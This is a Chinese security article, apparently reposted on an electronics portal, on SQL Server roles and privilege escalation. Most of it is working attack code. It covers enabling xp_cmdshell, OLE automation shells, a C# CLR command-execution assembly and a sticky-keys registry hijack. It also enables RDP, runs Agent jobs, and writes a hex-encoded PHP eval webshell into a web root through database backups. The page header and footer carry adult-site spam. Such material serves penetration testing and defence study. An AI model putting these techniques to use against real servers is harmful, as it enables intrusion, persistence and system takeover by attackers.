在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

sqlserver的角色及權限總結

jf_vLt34KHi ? 來源:Tide安全團隊 ? 2023-01-13 14:30 ? 次閱讀

1.sqlserver的角色及權限

sqlserver的角色分為兩種:服務器角色和數據庫角色

服務器角色:服務器角色的擁有者只有登入名,服務器角色是固定的,用戶無法創建服務器角色。

c990c5a6-7b92-11ed-8abf-dac502259ad0.png

數據庫角色:數據庫角色的擁有者可以是用戶也可以是數據庫角色本身,管理員可以創建數據庫角色。

c9a72ab2-7b92-11ed-8abf-dac502259ad0.png

在sqlserver中有三種特殊的用戶:

(1)系統管理員(dba權限),對應服務器角色sysadmin,可以執行sqlserver的任何動作,包括數據庫操作,文件管理,命令執行,注冊表讀取等,為sqlserver最高權限。

(2)數據庫所有者(dbo權限),對應數據庫角色db_owner, 可以執行數據庫中技術所有動作,包括文件管理,數據庫操作等。

(3)public角色是一種特殊的固定角色,數據庫的每個合法用戶都屬于該角色。它為數據庫中的用戶提供了所有默認權限。

判斷當前用戶角色(權限):

(1)判斷是否是sysadmin(dba權限),執行select is_srvrolemember('sysadmin')

c9d8dfc6-7b92-11ed-8abf-dac502259ad0.png

(2)判斷是否是db_owner(dbo權限),執行select is_member('db_owner')

c9f0320c-7b92-11ed-8abf-dac502259ad0.png

(3)判斷是否是public(普通權限),執行select is_srvrolemember('public')/select is_member('public')

ca091e0c-7b92-11ed-8abf-dac502259ad0.pngca1dbef2-7b92-11ed-8abf-dac502259ad0.png

2.最新版sqlserver提權測試(sqlserver2019)

文章測試均在sqlserver2019+win server2019中操作。經過測試sqlserver 2019默認安裝,使用dba權限執行whoami不是system權限,這是因為默認安裝的sqlserver服務不是用系統賬戶啟動的。

ca2ee894-7b92-11ed-8abf-dac502259ad0.pngca5c7994-7b92-11ed-8abf-dac502259ad0.pngcaa97866-7b92-11ed-8abf-dac502259ad0.png

如果安裝時或在服務中更改為本地系統賬戶,執行命令為system權限,可以創建用戶提權。

cad16786-7b92-11ed-8abf-dac502259ad0.png

3.xp_cmdshell(dba權限)

xp_cmdshell在低版本中默認開啟,由于存在安全隱患,在sqlserver2005以后,xp_cmdshell默認關閉。利用xp_cmdshell執行系統命令

--判斷xp_cmdshell是否存在,返回1證明存在xp_cmdshell
selectcount(*)frommaster.dbo.sysobjectswherextype='x'andname='xp_cmdshell'
cb74009a-7b92-11ed-8abf-dac502259ad0.png
--開啟xp_cmdshell
EXECsp_configure'showadvancedoptions',1;RECONFIGURE;EXECsp_configure'xp_cmdshell',1;RECONFIGURE;
--關閉xp_cmdshell
EXECsp_configure'showadvancedoptions',1;RECONFIGURE;EXECsp_configure'xp_cmdshell',0;RECONFIGURE;
cb89dbd6-7b92-11ed-8abf-dac502259ad0.pngcbaf24ea-7b92-11ed-8abf-dac502259ad0.png
--執行系統命令,sqlserver2019被降權為mssql權限
execmaster..xp_cmdshell'xxx'
cbcef3d8-7b92-11ed-8abf-dac502259ad0.png

4.sp_oacreate+sp_oamethod(dba權限)

在xp_cmdshell被刪除或不能利用是可以考慮利用sp_oacreate,利用前提需要sqlserver sysadmin賬戶服務器權限為system(sqlserver2019默認被降權為mssql)。

sp_oacreate 是一個存儲過程,可以刪除、復制、移動文件。

還能配合 sp_oamethod 來寫文件執行系統命令。

--判斷sp_oacreate是否存在,返回1證明存在sp_oacreate
selectcount(*)frommaster.dbo.sysobjectswherextype='x'andname='SP_OACREATE'
cbfc7f4c-7b92-11ed-8abf-dac502259ad0.png
--開啟
execsp_configure'showadvancedoptions',1;reconfigure;
execsp_configure'oleautomationprocedures',1;reconfigure;
--關閉
execsp_configure'showadvancedoptions',1;reconfigure;
execsp_configure'oleautomationprocedures',0;reconfigure;
cc15998c-7b92-11ed-8abf-dac502259ad0.pngcc35713a-7b92-11ed-8abf-dac502259ad0.png
--執行系統命令
declare@shellint
execsp_oacreate'wscript.shell',@shelloutput
execsp_oamethod@shell,'run',null,'C:\Windows\System32\cmd.exe/cwhoami'
cc560792-7b92-11ed-8abf-dac502259ad0.png

直接執行命令成功后無回顯。

--回顯執行系統命令結果
declare@shellint,@execint,@textint,@strvarchar(8000)
execsp_oacreate'wscript.shell',@shelloutput
execsp_oamethod@shell,'exec',@execoutput,'C:\Windows\System32\cmd.exe/cwhoami'
execsp_oamethod@exec,'StdOut',@textout
execsp_oamethod@text,'readall',@strout
select@str;
cc710a06-7b92-11ed-8abf-dac502259ad0.png

5.沙盒提權(dba權限)

沙盒模式是數據庫的一種安全功能。在沙盒模式下,只對控件和字段屬性中的安全且不含惡意代碼的表達式求值。

如果表達式不使用可能以某種方式損壞數據的函數或屬性,則可認為它是安全的。利用前提需要sqlserver sysadmin賬戶服務器權限為system(sqlserver2019默認被降權為mssql),服務器擁有 jet.oledb.4.0 驅動。

局限:

(1)Microsoft.jet.oledb.4.0一般在32位操作系統上才可以

(2)Windows 2008以上 默認無 Access 數據庫文件, 需要自己上傳 sqlserver2015默認禁用Ad Hoc Distributed Queries,需要開啟。

--開啟AdHocDistributedQueries
execsp_configure'showadvancedoptions',1;reconfigure;
execsp_configure'AdHocDistributedQueries',1;reconfigure;
--關閉AdHocDistributedQueries
execsp_configure'showadvancedoptions',1;reconfigure;
execsp_configure'AdHocDistributedQueries',0;reconfigure;
cc9ae178-7b92-11ed-8abf-dac502259ad0.pngccc6079a-7b92-11ed-8abf-dac502259ad0.png
--關閉沙盒模式
execmaster..xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',0;
--恢復默認沙盒模式
execmaster..xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',2;
ccefdf2a-7b92-11ed-8abf-dac502259ad0.png
沙盒模式SandBoxMode參數含義(默認是2)
0:在任何所有者中禁止啟用安全模式
1:為僅在允許范圍內
2:必須在access模式下
3:完全開啟
--查看沙盒模式
execmaster.dbo.xp_regread'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode'
cd0f4d92-7b92-11ed-8abf-dac502259ad0.png
--執行系統命令
select*fromopenrowset('microsoft.jet.oledb.4.0',';database=c:windowssystem32iasias.mdb','selectshell("cmd.exe/cwhoami")')

6.CLR(dba權限)

Microsoft SQL Server 2005之后,實現了對 Microsoft .NET Framework 的公共語言運行時(CLR)的集成。

CLR 集成使得現在可以使用 .NET Framework 語言編寫代碼,從而能夠在 SQL Server 上運行,現在就可以通過 C# 來編寫 SQL Server 自定義函數、存儲過程、觸發器等。

--開啟CLR
execsp_configure'showadvancedoptions',1;RECONFIGURE;
execsp_configure'clrenabled',1;RECONFIGURE;
--關閉CLR
execsp_configure'showadvancedoptions',1;RECONFIGURE;
execsp_configure'clrenabled',0;RECONFIGURE;
cd3118d2-7b92-11ed-8abf-dac502259ad0.pngcd5363d8-7b92-11ed-8abf-dac502259ad0.png
--當導入了不安全的程序集之后,需將數據庫標記為可信任的
ALTERDATABASEmasterSETTRUSTWORTHYON;
cddf1da6-7b92-11ed-8abf-dac502259ad0.png

做完上述準備之后需要編寫一個CLR,首先在本地visual studio中創建一個 SQL Server數據庫項目

cdff3cd0-7b92-11ed-8abf-dac502259ad0.png

然后,在項目中添加一個存儲過程

ce26da42-7b92-11ed-8abf-dac502259ad0.pngce4abb4c-7b92-11ed-8abf-dac502259ad0.png

寫入以下代碼,右鍵生成,會在vs的工作目錄項目名稱Database1inDebug下生成四個文件

usingSystem;
usingSystem.Diagnostics;
usingSystem.Text;
usingMicrosoft.SqlServer.Server;
publicpartialclassStoredProcedures
{
[Microsoft.SqlServer.Server.SqlProcedure]
publicstaticvoidCmdExec(Stringcmd)
{
//Putyourcodehere
SqlContext.Pipe.Send(Command("cmd.exe","/c"+cmd));
}

publicstaticstringCommand(stringfilename,stringarguments)
{
varprocess=newProcess();
process.StartInfo.FileName=filename;
if(!string.IsNullOrEmpty(arguments))
{
process.StartInfo.Arguments=arguments;
}
process.StartInfo.CreateNoWindow=true;
process.StartInfo.WindowStyle=ProcessWindowStyle.Hidden;
process.StartInfo.UseShellExecute=false;
process.StartInfo.RedirectStandardError=true;
process.StartInfo.RedirectStandardOutput=true;
varstdOutput=newStringBuilder();
process.OutputDataReceived+=(sender,args)=>stdOutput.AppendLine(args.Data);
stringstdError=null;
try
{
process.Start();
process.BeginOutputReadLine();
stdError=process.StandardError.ReadToEnd();
process.WaitForExit();
}
catch(Exceptione)
{
SqlContext.Pipe.Send(e.Message);
}
if(process.ExitCode==0)
{
SqlContext.Pipe.Send(stdOutput.ToString());
}
else
{
varmessage=newStringBuilder();
if(!string.IsNullOrEmpty(stdError))
{
message.AppendLine(stdError);
}
if(stdOutput.Length!=0)
{
message.AppendLine(stdOutput.ToString());
}
SqlContext.Pipe.Send(filename+arguments+"finishedwithexitcode="+process.ExitCode+":"+message);
}
returnstdOutput.ToString();
}
}
ce7159e6-7b92-11ed-8abf-dac502259ad0.png

之后需要將dll文件注冊進sqlserver,這里有三種方法注冊 (1)采用16進制的方式,無文件落地

CREATEASSEMBLYsp_cmdExec
FROM0x--這里寫.sql文件里的
WITHPERMISSION_SET=UNSAFE
ce8eff1e-7b92-11ed-8abf-dac502259ad0.pngcebee9fe-7b92-11ed-8abf-dac502259ad0.png

(2)將dll文件上傳到目標機器上進行注冊

CREATEASSEMBLYsp_cmdExec
FROM'C:UsersAdministratorDesktopDatabase1.dll'--這里寫上傳dll文件的路徑
WITHPERMISSION_SET=UNSAFE
ced37bbc-7b92-11ed-8abf-dac502259ad0.png

(3)通過 SSMS注冊dll

cef52ef6-7b92-11ed-8abf-dac502259ad0.png

注冊完成后,創建存儲過程

CREATEPROCEDUREsp_cmdExec
@Command[nvarchar](4000)
WITHEXECUTEASCALLER
AS
EXTERNALNAMEsp_cmdExec.StoredProcedures.CmdExec
cf264266-7b92-11ed-8abf-dac502259ad0.png
--執行系統命令
EXECsp_cmdExec'whoami';
cf4cb5ae-7b92-11ed-8abf-dac502259ad0.png

刪除存儲過程和程序集

DROPPROCEDUREsp_cmdExec;DROPASSEMBLYsp_cmdExec;
cf65fbcc-7b92-11ed-8abf-dac502259ad0.png

7.xp_regwrite映像劫持(dba權限)

xp_regread 與 xp_regwrite兩個存儲過程腳本可以直接讀取與寫入注冊表,利用regwrite函數修改注冊表,起到劫持作用。

利用前提sqlserver系統權限可以修改注冊表。

--判斷xp_rewrite是否存在,返回1證明存在xp_regwrite
selectcount(*)frommaster.dbo.sysobjectswherextype='x'andname='xp_regwrite'
cf7fc232-7b92-11ed-8abf-dac502259ad0.png
--開啟
EXECsp_configure'showadvancedoptions',1;RECONFIGURE
EXECsp_configure'xp_regwrite',1;RECONFIGURE
--關閉
EXECsp_configure'showadvancedoptions',1;RECONFIGURE
EXECsp_configure'xp_regwrite',0;RECONFIGURE

修改注冊表來劫持粘滯鍵,將粘滯鍵修改為打開cmd 在sqlserver2019+winserver2019中測試,win defender和火絨均會攔截

--劫持注冊表
EXECmaster..xp_regwrite@rootkey='HKEY_LOCAL_MACHINE',@key='SOFTWAREMicrosoftWindowsNTCurrentVersionImageFileExecutionOptionssethc.EXE',@value_name='Debugger',@type='REG_SZ',@value='c:windowssystem32cmd.exe'
--查看是否劫持成功
EXECmaster..xp_regread'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsNTCurrentVersionImageFileExecutionOptionssethc.exe','Debugger'
cf9ce010-7b92-11ed-8abf-dac502259ad0.png

劫持成功后連按5次shift會彈出cmd(win defender會攔截彈出的cmd并刪除已經劫持的注冊表) 還可以修改注冊表來開啟3389

execmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminalServer','fDenyTSConnections','REG_DWORD',0;

8.SQL Server Agent Job(dba權限)

SQL Server 代理是一項 Microsoft Windows 服務,它執行計劃的管理任務,這些任務在 SQL Server 中稱為作業。

--啟動sqlagent
execmaster.dbo.xp_servicecontrol'start','SQLSERVERAGENT'

利用任務計劃命令執行,創建任務 test并執行命令,將結果寫入1.txt

--執行命令
usemsdb;
execsp_delete_jobnull,'test'
execsp_add_job'test'
execsp_add_jobstepnull,'test',null,'1','cmdexec','cmd/c"whoami>c:/1.txt"'
execsp_add_jobservernull,'test',@@servername
execsp_start_job'test';
cfcb41a8-7b92-11ed-8abf-dac502259ad0.png

命令執行成功后沒有回顯,可以把1.txt寫到表中,再查詢表中內容獲取命令回顯。

--查看命令結果
Usemodel;
bulkinsertreadfilefrom'C:1.txt'
select*fromreadfile
cff11374-7b92-11ed-8abf-dac502259ad0.png

9.R和python(dbo/dba權限)

在 SQL Server 2017 及更高版本中,R 與 Python 一起隨附在機器學習服務中。

該服務允許通過 SQL Server 中 sp_execute_external_script 執行 Python 和 R 腳本。

利用前提sqlserver系統權限可以執行外部腳本

--開啟和關閉需要dba權限
--開啟
EXECsp_configure'externalscriptsenabled',1;RECONFIGURE
--關閉
EXECsp_configure'externalscriptsenabled',0;RECONFIGURE
d02e6044-7b92-11ed-8abf-dac502259ad0.pngd049d9be-7b92-11ed-8abf-dac502259ad0.png
--dbo和dba權限均可執行命令
--利用R執行命令
EXECsp_execute_external_script
@language=N'R',
@script=N'OutputDataSet<-?data.frame(system("cmd.exe?/c?dir",intern=T))'
WITH?RESULT?SETS?(([cmd_out]?text));
--利用python執行命令
exec?sp_execute_external_script
@language?=N'Python',
@script=N'import?subprocess
p?=?subprocess.Popen("cmd.exe?/c?whoami",?stdout=subprocess.PIPE)
OutputDataSet?=?pandas.DataFrame([str(p.stdout.read(),?"utf-8")])'
d0740f2c-7b92-11ed-8abf-dac502259ad0.pngd0992776-7b92-11ed-8abf-dac502259ad0.png

10.差異備份寫webshell(dbo權限)

dbo和dba都有備份數據庫權限,我們可以把數據庫備份成可執行腳本文件放到web目錄里,獲得 webshell。利用前提,知道網站絕對路徑且路徑可寫

--生成備份文件
backupdatabasetesttodisk='C:phpstudy_proWWW1.bak';
--創建表并寫入一句話木馬
createtabletest([cmd][image]);
Insertintotest(cmd)values(0x3c3f70687020406576616c28245f524551554553545b2761275d293b3f3e);
--將數據庫進行差異備份
backupdatabasetesttodisk='C:phpstudy_proWWWshell.php'WITHDIFFERENTIAL,FORMAT;
d0bbec16-7b92-11ed-8abf-dac502259ad0.pngd0dd8a88-7b92-11ed-8abf-dac502259ad0.pngd0fdb51a-7b92-11ed-8abf-dac502259ad0.png

蟻劍直接連接生成的shell.php

d1204206-7b92-11ed-8abf-dac502259ad0.png

dbo和dba都有備份數據庫權限,我們可以把數據庫備份成可執行腳本文件放到web目錄里,獲得 webshell。

利用前提(1)知道網站絕對路徑且路徑可寫(2)利用數據庫必須存在備份文件

alterdatabasetestsetRECOVERYFULL--將數據庫修改為完整模式
createtablecmd(aimage)--新建表
backuplogtesttodisk='c:phpstudy_prowww2.bak'withinit--備份表
insertintocmd(a)values(0x3c3f70687020406576616c28245f524551554553545b2761275d293b3f3e)--將一句話木馬寫入表中
backuplogtesttodisk='c:phpstudy_prowww2.php'--備份操作日志到指定腳本文件
d14c3564-7b92-11ed-8abf-dac502259ad0.png

蟻劍直接連接生成的2.php

d16d8124-7b92-11ed-8abf-dac502259ad0.png

12.sp_oacreate+sp_oamethod寫webshell(dba權限)

在sqlserver2019+win server2019中測試,win defender會報毒并刪除一句話木馬。

declare@oint,@fint,@tint,@retint
execsp_oacreate'scripting.filesystemobject',@oout
execsp_oamethod@o,'createtextfile',@fout,'C:phpstudy_prowww1.php',1
exec@ret=sp_oamethod@f,'writeline',NULL,''
d18967fe-7b92-11ed-8abf-dac502259ad0.png

13.不支持堆疊的情況下執行系統命令

select1where1=1if1=1execute('execsp_configure''showadvancedoptions'',1;reconfigure;execsp_configure''xp_cmdshell'',1;reconfigure;execxp_cmdshell''whoami''');
d1a736c6-7b92-11ed-8abf-dac502259ad0.png




審核編輯:劉清

聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。 舉報投訴
  • 服務器
    +關注

    關注

    12

    文章

    9579

    瀏覽量

    86932
  • SQL
    SQL
    +關注

    關注

    1

    文章

    779

    瀏覽量

    44696
  • python
    +關注

    關注

    56

    文章

    4822

    瀏覽量

    85803

原文標題:sql server提權總結

文章出處:【微信號:Tide安全團隊,微信公眾號:Tide安全團隊】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏

    評論

    相關推薦

    iMatrix平臺核心功能—權限管理介紹

    iMatrix平臺的權限管理系統(ACS)是一個基于角色的訪問控制(Role-BasedAccess Control)系統。熟悉RBAC的朋友應該知道,在RBAC中,權限角色是相關的
    發表于 07-11 11:59

    用PythonPi實現門禁系統-權限管控

    ,尤其是管理信息系統中,角色權限管理的核心概念,其約可等價于我們日常工作中的職位。我們可將職位視為由職權和職能組成,職權是對資源的訪問或使用權限,職能是允許采取那些行動。因為行動對于信息系統來說其實就是
    發表于 01-15 22:32

    通過高通平臺簡單總結權限問題

    用,但是程序本身查不出問題來,那就要抓log看一下了,很多時候就是因為沒有添加權限,下面簡單的總結了一下一、 遇到權限問題,在logcat或者kernel的log中一定會打印avc denied提示缺少
    發表于 09-27 16:53

    Linux 下 QT遠程連接sqlserver

    Linux 下 QT遠程連接sqlserver我按照網上的教程 沒有成功感覺是驅動安裝了 配置沒成功,請問下要配置哪些文件,數據庫是 sqlserver 2018
    發表于 12-06 15:53

    sqlserver如何批量導出數據

    sqlserver批量(部分)導出一張表中的數據
    發表于 06-11 11:58

    一個通用的權限管理模型的設計方案

    本文提出了一種集成功能權限和數據權限的通用的權限管理模型,該模型在主要對角色授權的基礎上加入了對用戶直接授權和屏蔽部分角色
    發表于 05-26 10:34 ?28次下載

    RBAC私有權限問題研究

    角色繼承關系中的私有權限問題是 RBAC 中一個尚未被很好解決的問題,通過對最新的研究成果進行分析,總結其優點分析不足,發現原有模型在靈活性和可管理性方面存在一些不足
    發表于 09-02 15:15 ?7次下載

    Delphi教程之如何動態建立SQLServer ODBC

    Delphi教程之如何動態建立SQLServer ODBC,學習Delphi的必備資料。
    發表于 03-31 11:29 ?4次下載

    基于角色的多約束動態權限管理模型

    在基于角色的訪問控制模型(RBAC)基礎上,引入訪問終端、網絡環境和接入方式等外部因素,提出了基于角色的多約束動態權限管理模型,依據外部因素的安全程度和資源可能帶來安全風險分別對外部因素和資源進行
    發表于 11-14 11:17 ?6次下載
    基于<b class='flag-5'>角色</b>的多約束動態<b class='flag-5'>權限</b>管理模型

    Linux進程權限的分析說明

     在linux下,關于文件權限,大部分人接觸比較多,也比較熟悉了解。但是對進程權限一般知之甚少。本文總結一下linux系統下進程權限問題和現象。
    發表于 07-17 10:55 ?948次閱讀

    權限框架jcasbin的角色權限配置

    然后最近我發現了另一個權限框架jcasbin,雖然網上還沒有很多關于博客,但是我看了一會就可以使用了。
    的頭像 發表于 10-21 10:58 ?1568次閱讀

    erp用戶權限管理怎么做

    執行一些操作,給系統數據及公司業務安全帶來風險。到底erp用戶權限管理該怎么做呢? erp用戶權限管理: 1 、ERP系統的授權機制 很多ERP系統采用的是目前國際上比較流行的基于角色的訪問機制(Role-Based Acces
    的頭像 發表于 12-02 14:50 ?2383次閱讀

    基于角色的松耦合式權限控制設計

    主體采用RBAC(Role-Base Access Control,基于角色的訪問控制)模型,就是用戶通過角色權限進行關聯實現,多對多的用戶角色關系模式。
    的頭像 發表于 01-12 14:31 ?1042次閱讀

    華納云:設置RBAC權限的方法

    設置 RBAC(基于角色的訪問控制) 權限通常涉及以下幾個步驟: 1. 定義角色: ? ?確定組織中不同的角色,這些角色應該反映組織結構和工
    的頭像 發表于 11-11 16:20 ?450次閱讀

    SqlServer數據恢復—SqlServer數據庫數據恢復案例

    一塊硬盤上存放的SqlServer數據庫,windows server操作系統+NTFS文件系統。由于誤操作導致分區損壞,需要恢復硬盤里的SqlServer數據庫數據。
    的頭像 發表于 01-09 11:15 ?300次閱讀
    <b class='flag-5'>SqlServer</b>數據恢復—<b class='flag-5'>SqlServer</b>數據庫數據恢復案例
    主站蜘蛛池模板: 伊人久久大香线蕉综合bd高清 | 美女拍拍拍爽爽爽爽爽爽 | 男人的天堂色偷偷之色偷偷 | 狠狠色噜噜狠狠狠狠98 | 就要爱综合 | 国模掰开| 欧美另类xx | 成人在线看片 | 婷婷色在线观看 | 日本中文在线三级在线播放 | 国产午夜爽爽窝窝在线观看 | 国产卡1卡2卡三卡网站免费 | 亚洲综合亚洲综合网成人 | 天堂网在线.www天堂在线 | 欧美色图综合网 | 国内一级野外a一级毛片 | 色接久久| 手机看片福利日韩国产 | 天天操操操操操操 | 四虎永久在线精品免费观看地址 | 寡妇影院首页亚洲图片 | 欧美精品国产第一区二区 | 我被黑人巨大开嫩苞在线观看 | 欧美三级在线观看视频 | 色五月丁香五月综合五月 | 美女 免费 视频 黄的 | 九九热国产 | 午夜福利123 | 亚洲综合在线一区 | 免费啪啪网站 | 亚洲激情网站 | 五月婷婷电影 | 天天干天天拍天天射 | 国产亚洲片 | 国产伦精品一区二区三区四区 | 黄色永久免费 | 最新欧美精品一区二区三区 | 99久久综合精品免费 | 一级骚片超级骚在线观看 | 夜夜超b天天| 激情性爽三级成人 |